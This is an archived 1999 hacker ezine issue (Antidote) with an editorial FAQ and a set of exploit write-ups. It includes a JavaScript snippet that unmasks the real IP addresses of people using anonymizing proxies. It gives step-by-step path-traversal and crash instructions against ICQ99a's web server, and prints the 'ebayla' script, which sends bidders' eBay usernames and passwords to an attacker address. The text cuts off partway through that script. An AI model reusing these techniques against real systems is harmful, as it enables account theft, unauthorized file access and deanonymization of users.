💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › ANTIDOTE › anti… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
Antidote Volume: 2 Issue: 1
(May 99)
____________________________________________________________________________________________________
| ________________________________________________________________________________________________ |
| | | |
| | ___ \ \ /\ | , | | \ \ ____ | |
| | ___ ___ \ \ / \ ___ | | | ___ \ \ ____ ____ | |
| | ___ \ \ |����| � | |�� �| |���| |���| |�� /___\ \ \ ____ | |
| | \ \ | | I I I__/ _|_ |___| |___| I__/ |____ \ \ | |
| |________________________________________________________________________________________________| |
|____________________________________________________________________________________________________|
------------------------------
Well here is another ezine put out by Antidote. This is our 5th issue that has come out. We have
over 300 subscribers so far and we hope to get more. Please keep in mind that this is an educational
ezine in wich we are not responsible for any information on here that you might use in the wrong and
improper way. Also, please keep in mind that just because we 'print' this information, that it
doesn't mean that we made the thing or the exploit up. Most everything in this magazine is made by
someone else and is recieved second hand (sent to us), in wich is printed/posted on here by us.
------------------------------
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - Complaints
0.03 - Sending Articles
0.04 - FAQ
1.00 - News & Exploits
1.01 - Anonymous Surfing
1.02 - ICQ99a Security Glitches
1.03 - Intruder Alert '99
1.04 - eBayla Bug
1.05 - Cold Fusion Vulnerability
2.00 - Misc.
2.01 - Configuring HardDrives
2.02 - Basic UNIX Commands
2.03 - PBBSER's code column
------------------------------
--=\\0.00\\=--
--------------
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be
wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and
happenings in the underground world. We aren't going to teach you how to hack or anything, but we
will supply you with the current information and exploits. Mainly Antidote is just a magazine for
people to read if they have some extra time on there hands and are bored with nothing to do. If you
want to read a magazine that teaches you how to hack etc, then you might want to go to your local
bookstore and see if they carry '2600'.
------------------------------
0.02 --=\\Complaints\\=--
Our last issue we got a lot of complaints about the content. Well, this is not our fualt now is it?
It might be in some ways, but you all have to submit things to us so we can post them in here and
have better content and articals etc... For submitting and rules, please see 0.03 (Sending Articles).
------------------------------
0.03 --=\\Sending Articles\\=--
As many of you know, we are always open to articles/submittings. We will take almost anything that
has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com"
was hacked... But if you have an opinion about the hacks that is fine. If you have any questions
about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with
your question and he will answer it.
Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has
written about/on this topic so that way you don't waste your time on writing something that won't
be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then
Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because
he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something that you would
like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and we will
review the article and put it in Antidote (if we like it).
------------------------------
0.04 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions".
Please read this before e-mailing us with questions and if the question isn't on here or doesn't
make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics, why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once a month with
the current news, exploits, flaws and even programming. All of the articles that are in here are
recieved second hand (sent to us) and we very rarely edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent to me through
e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your
e-mail address. You will recieve Antidote the second we release it and it will be sent as an
attachment
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to be
published above your article (when sending it to us) and we will do what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent it to us
first. If you sent us something and we didn't e-mail you back, then you might want to send it
again because we probably didn't get it (we respond to all e-mails no matter what). We might
use your article in future issues of Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it or not.
Well thats it for our FAQ. If you have a question that is not on here or the question is on here
and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and
he will answer your question. This FAQ will probably be updated every month.
------------------------------
--=\\1.00\\=--
--------------
1.01 --=\\Anonymous Surfing\\=--
A couple of weeks ago there was a message posted on alt.comp.virus claiming that the "anonymous"
web surfing programs are unsecure and are easily bypassed with various JavaScript writings.
One of the flaws just refreshes the current page 'killing' the proxy on your side, thus, revealing
your true IP address. The other one just 'pulls' your true IP address, but doesn't work in IE4.
These flaws have been found in the fallowing Anonymous Surfing Providers:
Anonymizer (http://www.anonymizer.com)
Bell Labs (http://www.bell-labs.com/project/lpwa)
Naval Research Laboratory (http://www.onion-router.net)
Aixs (http://aixs.net/aixs/)
Here is the coding for 'pulling' the true IP address from the 'victims' computer. Though, it
doesn't work with IE. This script can be viewed at:
http://www.tiac.net/users/smiths/js/livecon/index.htm in wich we claim/have no affiliation with.
Here is the JavaScript, put this in the 'body' of your webpage to take off anonymous surfing:
<script src=http://www.tiac.net/users/smiths/utils/common.js></script>
<script>JSDirectoryLine("LiveConnect and Java objects");</script>
<table border=1>
<tr><th align=center> Expression </th><th align=center> Result </th>
<th align=center> Comments </th></tr>
<script>
evalTableEntry_IENA('mydate = new java.util.Date()', "Make a Java <i>Date</i> object");
evalTableEntry_IENA('typeof(mydate)', "The type of a Java object is <i>object</i>");
evalTableEntry_IENA('mydate.toString()', "Convert the <i>Date</i> to a string");
evalTableEntry_IENA('typeof(mydate.toString())', "Oops, it's <b>not</b> a JavaScript string");
evalTableEntry_IENA('mydate + ""', "Here is another approach to do a string conversion");
evalTableEntry_IENA('typeof(mydate + "")', "This time we get a JavaScript string");
evalTableEntry_IENA('mydate.getMonth()', "Get the month field of the <i>Date</i> object");
evalTableEntry_IENA('typeof(mydate.getMonth())', "The getMonth() method returns a number as it should");
evalTableEntry_IENA('java.net.InetAddress.getLocalHost().getHostAddress()', "Get the IP address of the local machine");
evalTableEntry_IENA('java.net.InetAddress.getLocalHost().getHostName()', "Get the local machine name");
</script>
</table>
-Lord Oak (submitted by)
lordoak@thepoison.org
------------------------------
1.02 --=\\ICQ99a Security Glitches\\=--
As most people know, ICQ99a comes with a HTTPD in wich is found to be insecure. It has a lot of
vulnerablilities in wich one of them allows you to access someone's computer (remotely) and the
other one will crash their ICQ99a. These vulnerabilities only work on versions 1700 or lower.
How do you know if someone is running ICQ99a's HTTPD server? Well, when the user is online, look
to the right of their nick-name, and if there is a little house next to it, then they are running
it. Here is how they work:
The first one allows you to get into someone's computer (remotely). This enables you to make
any edits to their system you want. All you have to do is get the victims IP number. You can do
this by clicking on their nick-name and then going to "info". If they have it hidden, then you
can go to: http://members.icq.com/number and then put your mouse over one of the links on there
page and see where it is linking too, it should be something like: http://24.93.212.1/page.html
Not nessacarly that number, but any number. Now copy their IP address (from the link) and then
all you have to do is go 'up' a couple of directories in wich allows you to access there
computer. The only thing, is that they only allow .html files to be retrieved by your web
browser. So, all you have to do is add a /.html/ to the URL and it will think that you are trying
to proccess a .html file and it will let you view the directory. The URL should look something
like this:
http://127.0.0.1/.html/../../../../../../config.sys
You can add as many /../ files as you want to, it will just take you 'up' one more directory.
The second one allows you to crash the users ICQ99a. This one is easier then the other one. All
you have to do is get the users IP address (see the first one on how to get it) and then telnet
to their IP and Port Number '80'. It won't say anything after you are connected. After you are
connected, just type in a "Unknown String" or just a command that doesn't excist (ex: dfsdfh).
-Lord Oak (submitted by)
lordoak@thepoison.org
------------------------------
1.03 --=\\Intruder Alert '99\\=--
[copied from www.bonzi.com/intruderalert/ia99.htm]
Intruder ALERT '99 is a one of a kind Internet utility that can now notify you if someone is
trying to break in to your computer, stop them dead in their tracks, and even build a visual map
showing you the Intruder's ISP (Internet Service Provider) allowing you to visually see where the
Intruder is located and report them! You can now browse the Internet with the comfort and security
of knowing that no one from the Internet can access your computer without your knowledge or
permission!
Everytime you browse the Internet, send e-mail, or submit any private information to a web site,
you broadcast your computer's unique IP Address over the Internet. With this IP address, someone
can immediately begin trying to break into your computer without you even knowing it! Until now,
there has been no way of telling if this has happened or any way of stopping it! Well not anymore!
Intruder ALERT Attack Log:
IntruderALERT '99 is more than just protection against Internet Intruder's, it allows you to track
down your Intruder's ISP (Internet Service Provider) contact information and report the attack. This
allows you to contact the Intruder's ISP and make them aware that someone on their network has tried to
attack your computer. In most cases, they have the power to find out who the Intruder is and prevent
any future attacks. With the IntruderALERT '99 built in 'Attack Log', you can know the date, time, IP
Address, and Port Number used by the Intruder in the attack.
Mapping of the Intruder's ISP Location:
Intruder ALERT '99 can actually track down and give you a visual map of your Intruder's ISP location,
allowing you to see where your attacker came from! This allows you to see where in the world your
attacker is located. NOTE: This is a map of the ISP (Internet Service Provider) that the attacker is
using to get their Internet access.
Built In Port Management:
Intruder ALERT has a built in "Port Manager" allowing you an extra level of security. You can customize
the ports that Intruder ALERT will monitor to catch Intruders trying to break into your computer.
This is very handy when you suspect someone is trying to hurt you.
The Easiest Way to Protect Your PC from Intruders!
IntruderALERT '99 is easy-to-use! Once installed, you can go about your work without a worry. It runs
silently in the background protecting you. Every time you turn on your computer, IntruderALERT '99 starts
working automatically, only leaping into action when suspicious connection attempts are made to your computer.
Windows Sources Magazine:
The feature article in the November, 1997 issue of Windows Sources Magazine titled How to Practice Safe
Browsing reports the following: "Behind these headlines lie two fundamental concerns: fear that your browser
will let a malicious or ill-behaved program corrupt data on your PC and fear that a loophole in your browser
will give hackers access to your Web session so they can steal personal information while you're online. Both
Microsoft and Netscape have gone to great pains to make you feel secure using their browsers, stressing the
extremely small chance you'll fall prey to hackers. But neither company can anticipate every problem, so don't
expect the headlines to stop anytime soon."
http://www.bonzi.com/intruderalert/ia99.htm
------------------------------
1.04 --=\\eBayla Bug\=--
[copied from www.because-we-can.com]
[additions by Lord Oak]
This page describes a security problem that Blue Adept discovered with eBay's on-line auctions on March 31,
1999 (realaudio interview). The security hole allows eBay users to easily steal the passwords of other eBay
users. The exploit involves posting items for bid that include malicious javascript code as part of the item's
description. When an unsuspecting eBay user places a bid on the item, the embedded javascript code sends their
username and password to the malicious user by e-mail. From the victim's point of view, nothing unusual seems
to have occured, so they are unlikely to report/complain to eBay.
Once a malicious user knows the username/password of the victim's eBay account, she can assume full control of
the account, including the ability to:
-create new auctions (automtically charging the victim's account)
-place bids in the victim's name,
-retract legitimate bids in the victim's name,
-change the victim's username/password, barring them from eBay,
-associate bogus negative/positive comments with an arbitrary seller,
-prematurely close an auction being run by the victim.
-insert the ebayla code into the victim's auction.
-(The code could be altered to do this automatically, which would constitute an ebayla virus).
The security problem is dangerously easy to take advantage of. A malicious user needs only to embed the
javascript code into their description of an item for auction. A walk-through of the exploit demonstrates
step-by-step how any user can steal eBay passwords.
Blue Adept notified eBay that a 'huge' potential security problem existed on March 31,1999 and offered
assistance (but as of April 18, 1999 has only received form letter KMM798062C0KM in reply). Information about
the ebayla exploit is being made publicly available to speed the process of fixing the security hole.
Here is the current JavaScript code wich is used to steal the users/bidders Username and Password:
<script>
recipient = "blue_adept@because-we-can.com";
function printframeset(place_bid, mailUrl, username, password){
document.open(); document.writeln('<script>');
document.writeln('function go(){');
document.writeln('top.b.document.open();');
document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
document.writeln('top.b.document.writeln("</form>")');
document.writeln('top.b.document.close();'); document.writeln('}');
document.writeln('</scr' + 'ipt>'); document.writeln('</head>');
document.writeln('<frameset rows="100%,*" onLoad="go()">');
document.writeln('<frame name="t" src="' + place_bid + '">');
document.writeln('<frame name="b" src="">'); document.writeln('</frameset>');
document.close();}function urlEncode(inStr) {
outStr=' '; //not '' for a NS bug! for (i=0; i < inStr.length; i++) {
aChar=inStr.substring (i, i+1); switch(aChar){
case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
case '